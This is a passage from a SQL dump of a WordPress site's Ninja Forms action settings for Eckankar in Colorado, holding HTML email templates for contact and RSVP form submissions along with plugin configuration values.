    <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(6701,224,'attach_csv','0','attach_csv','0'),(6702,224,'email_format','html','email_format','html'),(6703,224,'reply_to','','reply_to',''),(6704,224,'cc','','cc',''),(6705,224,'bcc','','bcc',''),(6706,224,'redirect_url','','redirect_url',''),(6707,224,'success_msg','','success_msg',''),(6708,224,'label','Send copy to user','label','Send copy to user'),(6709,224,'parent_id','13','parent_id','13'),(6710,225,'objectType','Action','objectType','Action'),(6711,225,'objectDomain','actions','objectDomain','actions'),(6712,225,'editActive','','editActive',''),(6713,225,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6714,225,'payment_gateways','','payment_gateways',''),(6715,225,'payment_total','0','payment_total','0'),(6716,225,'tag','','tag',''),(6717,225,'email_message_plain','','email_message_plain',''),(6718,225,'submitter_email','','submitter_email',''),(6719,225,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6720,225,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6721,225,'set_subs_to_expire','0','set_subs_to_expire','0'),(6722,225,'subs_expire_time','90','subs_expire_time','90'),(6723,225,'title','','title',''),(6724,225,'key','','key',''),(6725,225,'type','successmessage','type','successmessage'),(6726,225,'active','1','active','1'),(6727,225,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(6728,225,'date_updated','2016-01-15','date_updated','2016-01-15'),(6729,225,'from_name','','from_name',''),(6730,225,'from_address','','from_address',''),(6731,225,'to','{wp:admin_email}','to','{wp:admin_email}'),(6732,225,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6733,225,'email_message','{fields_table}','email_message','{fields_table}'),(6734,225,'attach_csv','0','attach_csv','0'),(6735,225,'email_format','html','email_format','html'),(6736,225,'reply_to','','reply_to',''),(6737,225,'cc','','cc',''),(6738,225,'bcc','','bcc',''),(6739,225,'redirect_url','','redirect_url',''),(6740,225,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to RSVP for this event. <br></span></p>\n\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to RSVP for this event. <br></span></p>\n\n</div>'),(6741,225,'label','Success Message','label','Success Message'),(6742,225,'parent_id','13','parent_id','13'),(6743,225,'drawerDisabled','','drawerDisabled',''),(6744,226,'email_message_plain','','email_message_plain',''),(6745,226,'tag','','tag',''),(6746,226,'payment_gateways','','payment_gateways',''),(6747,226,'payment_total','0','payment_total','0'),(6748,226,'objectType','Action','objectType','Action'),(6749,226,'objectDomain','actions','objectDomain','actions'),(6750,226,'editActive','','editActive',''),(6751,226,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6752,226,'title','','title',''),(6753,226,'key','','key',''),(6754,226,'type','email','type','email'),(6755,226,'active','1','active','1'),(6756,226,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(6757,226,'date_updated','2016-01-19','date_updated','2016-01-19'),(6758,226,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(6759,226,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(6760,226,'to','eck.events@eckankar-colorado.org','to','eck.events@eckankar-colorado.org'),(6761,226,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(6762,226,'attach_csv','0','attach_csv','0'),(6763,226,'email_format','html','email_format','html'),(6764,226,'reply_to','','reply_to',''),(6765,226,'cc','','cc',''),(6766,226,'bcc','','bcc',''),(6767,226,'redirect_url','','redirect_url',''),(6768,226,'success_msg','','success_msg',''),(6769,226,'label','Admin Email','label','Admin Email'),(6770,226,'parent_id','13','parent_id','13'),(6771,226,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new ECK Temple \'Beautify Day\' form submission.<br><br><br></strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br><br><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br><br><br> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> </span><br><br><br> <br><br><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new ECK Temple \'Beautify Day\' form submission.<br><br><br></strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br><br><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br><br><br> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> </span><br><br><br> <br><br><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>'),(6772,226,'drawerDisabled','','drawerDisabled',''),(7165,240,'objectType','Action','objectType','Action'),(7166,240,'objectDomain','actions','objectDomain','actions'),(7167,240,'editActive','','editActive',''),(7168,240,'to','{wp:admin_email}','to','{wp:admin_email}'),(7169,240,'reply_to','','reply_to',''),(7170,240,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7171,240,'email_message','{fields_table}','email_message','{fields_table}'),(7172,240,'email_message_plain','','email_message_plain',''),(7173,240,'from_name','','from_name',''),(7174,240,'from_address','','from_address',''),(7175,240,'email_format','html','email_format','html'),(7176,240,'cc','','cc',''),(7177,240,'bcc','','bcc',''),(7178,240,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(7179,240,'redirect_url','','redirect_url',''),(7180,240,'submitter_email','','submitter_email',''),(7181,240,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7182,240,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7183,240,'set_subs_to_expire','0','set_subs_to_expire','0'),(7184,240,'subs_expire_time','90','subs_expire_time','90'),(7185,240,'message','This action adds users to WordPress&#039; personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.','message','This action adds users to WordPress&#039; personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.'),(7186,240,'score','0.5','score','0.5'),(7187,240,'drawerDisabled','','drawerDisabled',''),(7188,241,'objectType','Action','objectType','Action'),(7189,241,'objectDomain','actions','objectDomain','actions'),(7190,241,'editActive','','editActive',''),(7191,241,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7192,241,'payment_gateways','','payment_gateways',''),(7193,241,'payment_total','0','payment_total','0'),(7194,241,'tag','','tag',''),(7195,241,'to','{wp:admin_email}','to','{wp:admin_email}'),(7196,241,'reply_to','','reply_to',''),(7197,241,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7198,241,'email_message','{fields_table}','email_message','{fields_table}'),(7199,241,'email_message_plain','','email_message_plain',''),(7200,241,'from_name','','from_name',''),(7201,241,'from_address','','from_address',''),(7202,241,'email_format','html','email_format','html'),(7203,241,'cc','','cc',''),(7204,241,'bcc','','bcc',''),(7205,241,'redirect_url','','redirect_url',''),(7206,241,'submitter_email','','submitter_email',''),(7207,241,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7208,241,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7209,241,'set_subs_to_expire','0','set_subs_to_expire','0'),(7210,241,'subs_expire_time','90','subs_expire_time','90'),(7211,241,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(7212,241,'title','','title',''),(7213,241,'key','','key',''),(7214,241,'type','save','type','save'),(7215,241,'active','1','active','1'),(7216,241,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(7217,241,'label','Save Form','label','Save Form'),(7218,241,'parent_id','13','parent_id','13'),(7219,242,'objectType','Action','objectType','Action'),(7220,242,'objectDomain','actions','objectDomain','actions'),(7221,242,'editActive','','editActive',''),(7222,242,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7223,242,'payment_gateways','','payment_gateways',''),(7224,242,'payment_total','0','payment_total','0'),(7225,242,'tag','','tag',''),(7226,242,'email_message_plain','','email_message_plain',''),(7227,242,'title','','title',''),(7228,242,'key','','key',''),(7229,242,'type','email','type','email'),(7230,242,'active','0','active','0'),(7231,242,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(7232,242,'date_updated','2016-01-15','date_updated','2016-01-15'),(7233,242,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(7234,242,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(7235,242,'to','{field:email_270}','to','{field:email_270}'),(7236,242,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(7237,242,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(7238,242,'attach_csv','0','attach_csv','0'),(7239,242,'email_format','html','email_format','html'),(7240,242,'reply_to','','reply_to',''),(7241,242,'cc','','cc',''),(7242,242,'bcc','','bcc',''),(7243,242,'redirect_url','','redirect_url',''),(7244,242,'success_msg','','success_msg',''),(7245,242,'label','Send copy to user','label','Send copy to user'),(7246,242,'parent_id','13','parent_id','13'),(7247,243,'objectType','Action','objectType','Action'),(7248,243,'objectDomain','actions','objectDomain','actions'),(7249,243,'editActive','','editActive',''),(7250,243,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 